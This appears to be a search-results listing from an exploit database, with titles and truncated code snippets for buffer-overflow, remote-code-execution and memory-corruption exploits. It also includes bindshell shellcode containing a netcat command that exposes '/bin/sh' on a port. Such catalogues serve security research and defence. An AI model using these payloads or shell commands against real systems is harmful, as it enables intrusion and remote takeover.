189 matches found
GoodTech Telnet Server < 5.0.7 - Remote BoF Exploit (updated)
No description provided by source. / cybertronicatgmxdotnet offset fixed! cybertronic @ GoodTech $ gcc -o goodtechexpl goodtechexpl.c cybertronic @ GoodTech $ ./goodtechexpl Usage ----- Bindshell ./goodtechexpl host Reverseshell ./goodtechexpl host connectback ip connectback port cybertronic @...
PHP <= 4.4.6 / 5.2.1 array_user_key_compare() ZVAL dtor Local Exploit
No description provided by source. <?php // Proof of concept code from the Hardened-PHP...
PHP <= 4.4.6 / 5.2.1 ext/gd Already Freed Resources Usage Exploit
No description provided by source. <?php // Proof of concept code from the Hardened-PHP...
phptax 0.8 <= Remote Code Execution Vulnerability
Exploit for php platform in category web applications. phptax 0.8. Vendor information: "PhpTax is free software to do your U.S. income taxes. Tested under Unix environment. The program generates .pdfs that can be printed and sent to the IRS. See...
phptax 0.8 - Remote Code Execution
phptax 0.8 - Remote Code Execution. phptax 0.8. Vendor information: "PhpTax is free software to do your U.S. income taxes. Tested under Unix environment. The program generates .pdfs that can be printed and sent to the IRS. See homepage for detai...
PHP 5.4 Win32 Code Execution
// Exploit Title: PHP 5.4 5.4.3 Code Execution 0day Win32 // Exploit author: 0in Maksymilian Motyl // Email: 0indotemailatgmail.com // Bug with Variant type parsing originally discovered by Condis // Tested on Windows XP SP3 fully patched Polish =================== offset-brute.html...
MailMax <=v4.6 POP3 "USER" Remote Buffer Overflow Exploit
Exploit for windows platform in category remote exploits !/usr/bin/python MailMax \n" %sys.argv0 sys.exit print "\n! Connecting to %s ..." %sys.argv1 connect to host sock = socketAFINET,SOCKSTREAM sock.connectsys.argv1,intsys.argv2 sock.recv1024 time.sleep5 buffer = "USER " buffer += "A" 1439...
MailMax 4.6 POP3 Buffer Overflow
!/usr/bin/python MailMax \n" %sys.argv0 sys.exit print "\n! Connecting to %s ..." %sys.argv1 connect to host sock = socketAFINET,SOCKSTREAM sock.connectsys.argv1,intsys.argv2 sock.recv1024 time.sleep5 buffer = "USER " buffer += "A" 1439 padding buffer += "\xEB\x06\x90\x90" Short jmp 6 bytes buffe...
WorldMail imapd 3.0 SEH overflow (egg hunter)
Exploit for windows platform in category remote exploits !/usr/bin/python import sys import socket Exploit Title: WorldMail imapd 3.0 SEH overflow egg hunter Tested on: XP SP3 en-us Author: TheXero Website: www.thexero.co.uk http://www.nullsecurity.net Check for parameters if lensys.argv != 3:...
IBM-Tivoli-Storage
A vulnerability exists in the way the IBM Tivoli Storage Manager Express 5.3 CAD Service processes a client's request. The vulnerability is caused by a boundary error when handling network messages and can be exploited to cause a stack-based buffer overflow via a specially crafted...
BSDi/x86 - BindShell on 31337 port - Shellcode 117 Bytes
Exploit database separated by exploit type (local, remote, DoS, etc.). Site: 1337day.com. Support e-mail:...
Linux/x86 - netcat bindshell port 6666 - 69 bytes
No description provided by source. / Title: Linux/x86 - netcat bindshell port 6666 - 69 bytes Date: 2011-04-20 Author: Jonathan Salwan http://shell-storm.org http://twitter.com/!/shellstorm /usr/bin/netcat -ltp6666 -e/bin/sh 8048054 .text: 8048054: 31 c0 xor %eax,%eax 8048056: 50 push %eax 804805...
linux/x86 - netcat bindshell port 6666 - 69 bytes
/ Title: Linux/x86 - netcat bindshell port 6666 - 69 bytes Date: 2011-04-20 Author: Jonathan Salwan http://shell-storm.org http://twitter.com/!/shellstorm /usr/bin/netcat -ltp6666 -e/bin/sh 8048054 : 8048054: 31 c0 xor %eax,%eax 8048056: 50 push %eax 8048057: 68 74 63 61 74 push $0x74616374...
Linux/x86 - netcat bindshell port 6666 - 69 bytes
Linux/x86 - netcat bindshell port 6666 - 69 bytes. Shellcode exploit for linux platform / Title: Linux/x86 - netcat bindshell port 6666 - 69 bytes Date: 2011-04-20 Author: Jonathan Salwan http://shell-storm.org http://twitter.com/jonathansalwan /usr/bin/netcat -ltp6666 -e/bin/sh 8048054 : 8048054...
Microsoft Internet Explorer 6/7/8 - Memory Corruption
Internet Explorer Memory Corruption 0day Vulnerability CVE-2010-3962 Tested on Windows XP SP3 IE6 IE7 IE8 Coded by Matteo Memelli ryujin at offsec.com http://www.offensive-security.com/0day/ie-0day.txt Thx to dookie at offsec.com notes : This is a quick and dirty exploit! No DEP/ASLR bypass here...
linux/ARM - Bindshell port 0x1337 Shellcode
Exploit for linux/x86 platform in category shellcode. linux/ARM - Bindshell port 0x1337 Shellcode. / Title: arm-bind-listen Brief: Bind a shell to port 0x1337 on any local address and wait for connections Author...
ARM Bindshell port 0x1337
ARM Bindshell port 0x1337. Shellcode exploit for arm platform / Title: arm-bind-listen Brief: Bind a shell to port 0x1337 on any local address and wait for connections Author: Daniel Godas-Lopez / / socdes = socketAFINET, SOCKSTREAM, IPPROTOTCP; / mov %r0, $2 / AFINET / mov %r1, $1 / SOCKSTREAM /...
bds/x86-bindshell on port 2525 shellcode - 167 bytes
bds/x86-bindshell on port 2525 shellcode - 167 bytes. Shellcode exploit for bsd platform. bds/x86-bindshell on port 2525 shellcode 167 bytes. bds/x86-bindshell on port 2525 167...
SigPlus Pro 3.74 Buffer Overflow
SigPlus Pro v3.74 ActiveX Signature Capture LCDWriteString Remote BoF JIT Spray - aslr/dep bypass Author: mrme - @StevenSeeley Download:...
SigPlus Pro 3.74 - ActiveX 'LCDWriteString()' Remote Buffer Overflow JIT Spray (ASLR + DEP Bypass)
SigPlus Pro v3.74 ActiveX Signature Capture LCDWriteString Remote BoF JIT Spray - aslr/dep bypass Author: mrme - @StevenSeeley Download:...